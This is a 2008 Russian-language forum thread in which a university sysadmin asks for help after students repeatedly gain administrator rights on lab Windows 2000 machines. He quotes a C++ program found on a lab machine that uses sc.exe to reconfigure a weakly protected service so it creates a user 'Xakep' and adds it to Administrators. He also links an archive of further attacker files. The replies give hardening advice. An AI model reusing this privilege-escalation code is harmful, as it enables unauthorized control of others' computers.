![]() |
Внимание, важное сообщение: Дорогие Друзья!
В ноябре далекого 2001 года мы решили создать сайт и форум, которые смогут помочь как начинающим, так и продвинутым пользователям разобраться в операционных системах. В 2004-2006г наш проект был одним из самых крупных ИТ ресурсов в рунете, на пике нас посещало более 300 000 человек в день! Наша документация по службам Windows и автоматической установке помогла огромному количеству пользователей и сисадминов. Мы с уверенностью можем сказать, что внесли большой вклад в развитие ИТ сообщества рунета. Но... время меняются, приоритеты тоже. И, к сожалению, пришло время сказать До встречи! После долгих дискуссий было принято решение закрыть наш проект. 1 августа форум переводится в режим Только чтение, а в начале сентября мы переведем рубильник в положение Выключен Огромное спасибо за эти 24 года, это было незабываемое приключение. Сказать спасибо и поделиться своей историей можно в данной теме. С уважением, ваш призрачный админ, BigMac... |
|
Компьютерный форум OSzone.net » Информационная безопасность » Защита компьютерных систем » Утилиты - Взломали при помощи C++ и SC.ехе |
|
Утилиты - Взломали при помощи C++ и SC.ехе
|
Пользователь Сообщения: 88 |
Привет всем.
Сразу прошу прошение за ошибки (не из России я). Такая проблема у миня, я СисАдмин в Университете (администрираю 40 комп. OS : Win 2000 Pro (all hotfixes)) В прошом году меня тоже взломали, уже не знал чо делать, но нечаина на один компютар нашол утилиты : sc.exe и Service Permissions Checker. Вот што они делали : ![]() После того как удалил всё, вот што показовала : ![]() Карочи, удалил я Macromedia Licensing.exe, и Сервис тоже удалил в регедит, думал што всё теперь проблем больше не будет, не тут то было. Согодня опять спалил новыи Юзер "Хакер", и на Диск Д: нашол код зделан в С++. // sys.cpp : Defines the entry point for the console application. // #include "stdafx.h" #include <stdlib.h> #include <windows.h> #include <conio.h> int main(int argc, char* argv[]) { // WinExec("sc.exe queryex \"Macromedia Licensing Services\" > d:\\log.log.log",SW_SHOW); WinExec("sc.exe config \"Macromedia Licensing Service\" binPath= \"net user Xakep Xakep /add\"",SW_SHOW); Sleep(1000); WinExec("sc.exe start \"Macromedia Licensing Service\"",SW_SHOW); Sleep(1000); WinExec("sc.exe config \"Macromedia Licensing Service\" binPath= \"net localuser Administrators Xakep /add\"",SW_SHOW); Sleep(1000); WinExec("sc.exe start \"Macromedia Licensing Service\"",SW_SHOW); getch(); return 0; } ..и ищо несколько фаилов, вылажу на рапид штоб посмотрели: http://rapidshare.com/files/87310556/sys.rar.html В моём зале много програм есть в том числе и Visual Studio ну конечно есть и cmd.exe Все студенты работают под User - Restricted user. С: - read & Execute, в regedit тоже самое, и в Group Policy по игрался. Не понемаю как они создают новыи Сервис в регедит, User имеет права толыко читать, есть предположение што они под Юзер : System делают ето. Помогите пожалуиста, не знаю уже што делать, спасибо аднозначно, жду ответов штоб решить проблему. |
|
Отправлено: 20:12, 28-01-2008 |
Пользователь Сообщения: 88
|
Профиль | Отправить PM | Цитировать Нет, нечево не получилось
![]() пфффф не жаю больше чо делать... |
Отправлено: 19:08, 29-01-2008 | #11 |
Для отключения данного рекламного блока вам необходимо зарегистрироваться или войти с учетной записью социальной сети. Если же вы забыли свой пароль на форуме, то воспользуйтесь данной ссылкой для восстановления пароля. |
Dr. Piligrim Сообщения: 2443
|
Профиль | Отправить PM | Цитировать Цитата eXtremer:
Using Software Restriction Policies to Protect Against Unauthorized Software , можно закрутить гайки доп.-но применением шаблона hisecws.inf через оснастку Security Configuration and Analysis или использовать сторонный софт, позволяющий контролировать доступ... или что-то типа vmware |
|
------- Отправлено: 23:11, 29-01-2008 | #12 |
Пользователь Сообщения: 88
|
Профиль | Отправить PM | Цитировать Усио решил поставлю Deep Freeze до выеснение апстаятельств...штоб не иб* много, в суботу поставлю.
|
Последний раз редактировалось eXtremer, 30-01-2008 в 12:50. Отправлено: 09:56, 30-01-2008 | #13 |
Пользователь Сообщения: 88
|
Профиль | Отправить PM | Цитировать Вчера сам сел на один комп. и начел игратся с sc.exe , нечего не получалось, не старт, не стоп, не create service - access denied, так што они уже наверое под Админом делают этот service.
И ищо што интересно, почему назывют этот сервис только Macromedia Licensing ? есть два варината : 1. или называют так штоб я не сполил новыи созданыи сервис, либо 2. они могут создать толыко этот сервис!Надо както зделать штоб они не могли создать этот сервис, но как ? может бить сам его создать а потом убрать SYSTEM и User в regedt32 все права ?! |
Отправлено: 13:15, 30-01-2008 | #14 |
Dr. Piligrim Сообщения: 2443
|
Профиль | Отправить PM | Цитировать eXtremer, поменять пароль админа (можно и имя Administrator переименовать), провести аудит и снести всех других локальных админов (можно с помощью групп. политики тут). Можно дополнительно воспользоваться утилитой syskey How to use the SysKey utility to secure the Windows Security Accounts Manager database
Есть предположение что хакеры а)повышают привилегии через уязвимости установленного софта, поэтому поставить все патчи на весь установленный софт б)используют для своих нужд ранее внедренный backdoor/trojan, поэтому провести глубокий анализ всего софта всевозможными утилитами, включая антивирусные (AVZ, CureIT, SdFix, ComboFix) Цитата eXtremer:
Кстати, можно попробовать дополнительно установить HIPS (типа processguard или лучше defencewall ) и закрыть HIPS паролем. |
|
------- Последний раз редактировалось Pili, 30-01-2008 в 15:59. Отправлено: 15:42, 30-01-2008 | #15 |
Пользователь Сообщения: 88
|
Профиль | Отправить PM | Цитировать Скачал сегодня ProcessGuard 3.410, посталвю в субботу, но не знаю елси это штота даст...
|
Отправлено: 10:41, 31-01-2008 | #16 |
![]() |
Участник сейчас на форуме |
![]() |
Участник вне форума |
![]() |
Автор темы |
![]() |
Сообщение прикреплено |
| |||||
Название темы | Автор | Информация о форуме | Ответов | Последнее сообщение | |
Легализация при помощи GGK | SamLab | Лицензирование продуктов Microsoft | 2 | 16-01-2008 11:43 | |
Взломали. Что делать? | Gangabass | Общий по Linux | 5 | 07-09-2007 10:25 | |
Ошибка rundll32.exe при открытии любого ехе-шника | Bozs | Microsoft Windows 2000/XP | 6 | 19-10-2006 15:13 | |
Прошу помощи при работе со скайнером. | Belferman Moisey | Microsoft Windows 95/98/Me (архив) | 2 | 15-06-2006 14:06 | |
Сеть. При помощи модемов | lossen | Сетевые технологии | 33 | 10-08-2004 19:04 |
|